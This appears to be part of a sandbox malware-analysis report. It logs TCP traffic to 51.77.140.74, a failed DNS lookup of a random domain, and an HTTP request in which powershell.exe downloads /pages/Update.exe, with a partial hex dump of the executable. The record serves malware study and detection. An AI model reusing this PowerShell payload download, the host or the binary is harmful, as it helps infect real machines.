                                  Jul 26, 2024 23:14:33.681294918 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.681315899 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.681349039 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.681361914 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.681380987 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.681502104 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.681529999 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.681550980 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.681566000 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.681579113 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.681612015 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.681639910 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.681659937 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.681670904 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.681704998 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.681731939 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.681751966 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.681762934 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.681766987 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.681797028 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.681828976 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.681842089 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.681862116 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.681894064 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.681907892 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.681926966 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.681958914 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.681992054 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.682012081 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.682024002 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.682028055 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.682056904 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.682089090 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.682121992 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.682132959 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.682154894 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.682199955 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.682472944 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.682506084 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.682550907 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.682555914 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.682590008 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.682600021 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.682621956 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.682655096 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.682666063 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.682687998 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.682719946 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.682733059 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.682750940 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.682782888 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.682811975 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.682831049 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.682842970 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.682848930 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.682874918 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.682903051 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.682934999 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.682955980 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.682967901 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.682967901 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.682996988 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.683028936 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.683043003 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.683063030 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.683090925 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.683132887 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.683309078 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.683362961 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.683396101 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.683408976 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.683428049 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.683439970 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.683461905 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.683492899 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.683511972 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.683527946 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.683559895 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.683593988 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.683604956 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.683626890 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.683660030 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.683670998 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.683692932 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.683705091 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.683726072 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.683772087 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.769809961 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.769893885 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.769999981 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.770025015 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.770061016 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.770100117 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.770109892 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.770144939 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.770195007 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.770195961 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.770227909 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.770261049 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.770282030 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.770298958 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.770345926 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.770348072 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.770380020 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.770411968 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.770426035 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.770445108 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.770479918 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.770493031 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.770529985 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.770562887 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.770595074 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.770613909 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.770627022 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.770637035 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.770677090 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.770709038 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.770741940 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.770756006 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.770773888 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.770785093 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.770806074 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.770838022 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.770869970 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.770879984 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.770904064 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.770936966 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.770950079 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.770968914 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.771001101 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.771012068 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.771034956 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.771065950 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.771080971 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.771100044 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.771127939 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.771147013 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.771159887 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.771193027 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.771205902 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.771225929 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.771260023 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.771271944 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.771291971 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.771325111 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.771344900 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.771354914 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.771356106 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.771388054 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.771420002 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.771455050 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.771466017 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.771487951 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.771495104 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.771522045 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.771555901 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.771578074 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.771589994 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.771621943 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.771667957 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.771668911 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.771701097 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.771740913 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.771745920 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.771774054 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.771806002 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.771823883 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.771837950 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.771871090 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.771883965 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.771903038 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.771934986 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.771948099 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.771987915 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.772022009 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.772034883 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.772054911 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.772089005 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.772099018 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.772121906 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.772155046 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.772171974 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.772186995 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.772219896 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.772232056 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.772252083 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.772284031 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.772299051 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.772315025 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.772350073 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.772361040 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.772377968 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.772409916 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.772423983 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.772443056 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.772449970 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.772475004 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.772528887 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.772552013 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.772583961 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.772617102 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.772630930 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.772650003 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.772681952 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.772691011 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.772713900 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.772747040 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.772778034 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.772793055 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.772810936 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.772819996 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.772842884 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.772875071 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.772886038 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.772927046 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.772958994 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.772974014 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.772989988 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.773022890 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.773072004 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.773072004 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.773104906 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.773139954 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.773150921 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.773174047 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.773206949 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.773220062 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.773616076 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.773648024 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.773668051 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.773679972 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.773711920 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.773725033 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.773745060 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.773793936 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.773823023 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.773827076 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.773852110 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.773858070 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.773890972 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.773919106 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.773935080 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.773952961 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.773963928 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.773986101 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.774036884 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.774070024 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.774080038 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.774102926 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.774111986 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.774137020 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.774168968 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.774194002 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.774200916 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.774231911 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.774241924 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.774265051 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.774307013 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.774624109 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.774658918 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.774708033 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.774768114 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.774800062 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.774847031 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.855032921 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.855087996 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.855118036 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.855151892 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:33.855209112 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:33.855242014 CEST804974151.77.140.74192.168.2.4

                                  DNS Queries

                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Jul 26, 2024 23:13:58.100555897 CEST192.168.2.41.1.1.10x22daStandard query (0)uJZnxDofibxcgfjvDTnvqoPmvCzWh.uJZnxDofibxcgfjvDTnvqoPmvCzWhA (IP address)IN (0x0001)false

                                  DNS Answers

                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Jul 26, 2024 23:13:58.110740900 CEST1.1.1.1192.168.2.40x22daName error (3)uJZnxDofibxcgfjvDTnvqoPmvCzWh.uJZnxDofibxcgfjvDTnvqoPmvCzWhnonenoneA (IP address)IN (0x0001)false

                                  HTTP Packets

                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.44974151.77.140.74802504C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 26, 2024 23:14:22.101624012 CEST78OUTGET /pages/Update.exe HTTP/1.1
                                  Host: 51.77.140.74
                                  Connection: Keep-Alive
                                  Jul 26, 2024 23:14:22.752584934 CEST1236INHTTP/1.1 200 OK
                                  Date: Fri, 26 Jul 2024 21:14:22 GMT
                                  Server: Apache/2.4.61 (Debian)
                                  Last-Modified: Mon, 22 Jul 2024 15:09:34 GMT
                                  ETag: "52aa099-61dd76ecaa548"
                                  Accept-Ranges: bytes
                                  Content-Length: 86679705
                                  Keep-Alive: timeout=5, max=100
                                  Connection: Keep-Alive
                                  Content-Type: application/x-msdos-program
                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1c 09 0d a3 58 68 63 f0 58 68 63 f0 58 68 63 f0 13 10 60 f1 5f 68 63 f0 13 10 66 f1 ec 68 63 f0 13 10 67 f1 52 68 63 f0 9b eb 9e f0 5b 68 63 f0 9b eb 60 f1 51 68 63 f0 9b eb 67 f1 49 68 63 f0 9b eb 66 f1 70 68 63 f0 13 10 62 f1 53 68 63 f0 58 68 62 f0 c9 68 63 f0 4b ec 67 f1 41 68 63 f0 4b ec 61 f1 59 68 63 f0 52 69 63 68 58 68 63 f0 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 42 75 9e 66 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 28 00 94 02 00 00 58 02 00 00 00 00 00 d0 c0 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 05 00 00 04 00 00 7a 35 [TRUNCATED]
                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$XhcXhcXhc`_hcfhcgRhc[hc`QhcgIhcfphcbShcXhbhcKgAhcKaYhcRichXhcPEdBuf"(X@z5+`lx`"h@P.text `.rdataB&(@@.datas@.pdata"`$@@.rsrc@@.reloch@B
                                  Jul 26, 2024 23:14:22.752609015 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                  Data Ascii: H(/H'HHHHHH($HqCH\$Hl$ LD$VWATAUAWH H3HDIHA.LH
                                  Jul 26, 2024 23:14:22.752625942 CEST1236INData Raw: 8d 0d 02 a4 02 00 e8 75 11 00 00 33 c0 48 8b 5c 24 58 48 83 c4 20 41 5f 41 5e 5e c3 8b 56 04 45 33 c0 48 03 93 00 10 00 00 49 8b cf e8 53 e5 00 00 85 c0 79 1c 4c 8d 46 12 48 8d 15 00 a4 02 00 48 8d 0d 35 a4 02 00 e8 a4 12 00 00 e9 bb 00 00 00 8b
                                  Data Ascii: u3H\$XH A_A^^VE3HISyLFHH5N,LHu DNLFH H-t~uME3HIc^Hl$@IH|$HLd$PHt8A fDI;HMAIGHHnHrBHH+u3H|$H
                                  Jul 26, 2024 23:14:22.752777100 CEST1236INData Raw: 80 00 00 00 41 b8 08 00 00 00 48 c1 e8 18 48 8b cf 04 0c 48 89 b4 24 a8 00 00 00 88 84 24 83 00 00 00 e8 35 5d 00 00 48 8b f0 48 85 c0 0f 84 37 02 00 00 45 33 c0 48 8b d0 48 8b cf e8 6f e0 00 00 85 c0 79 18 48 8d 15 20 a0 02 00 48 8d 0d 55 9f 02
                                  Data Ascii: AHHH$$5]HH7E3HHoyH HULHL$ XAHsHH_`n'HHuHH(_LLHD$(H D$(LL$8D$,
                                  Jul 26, 2024 23:14:22.752793074 CEST1236INData Raw: 48 89 87 30 20 00 00 41 b9 84 08 30 50 48 8b 07 45 33 c0 48 89 44 24 50 b9 00 02 00 00 48 8b 47 08 48 89 6c 24 48 48 89 44 24 40 c7 44 24 38 00 00 00 80 c7 44 24 30 00 00 00 80 c7 44 24 28 00 00 00 80 c7 44 24 20 00 00 00 80 ff 15 47 95 02 00 48
                                  Data Ascii: H0 A0PHE3HD$PHGHl$HHD$@D$8D$0D$(D$ GHl$XLH8 HHAPHD$P3HGHD$HHD$@D$8D$0D$(D$ LP E3HOH@ ULP HOA9LP
                                  Jul 26, 2024 23:14:22.752809048 CEST1236INData Raw: 50 41 5e 5f 5e 5d 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc 40 55 53 56 57 41 56 48 8d ac 24 30 df ff ff b8 d0 21 00 00 e8 57 98 00 00 48 2b e0 48 8b 05 1d bd 03 00 48 33 c4 48 89 85 c0 20 00 00 48 8b d9 4d 8b f0 33 c9 48 8b f2 ff 15 62 8d 02 00
                                  Data Ascii: PA^_^][@USVWAVH$0!WH+HH3H HM3Hb3HAHt3HLf@H3HL$X3HD$8A@ ,tHH|$0HHHD$@HIHD$HHHD$
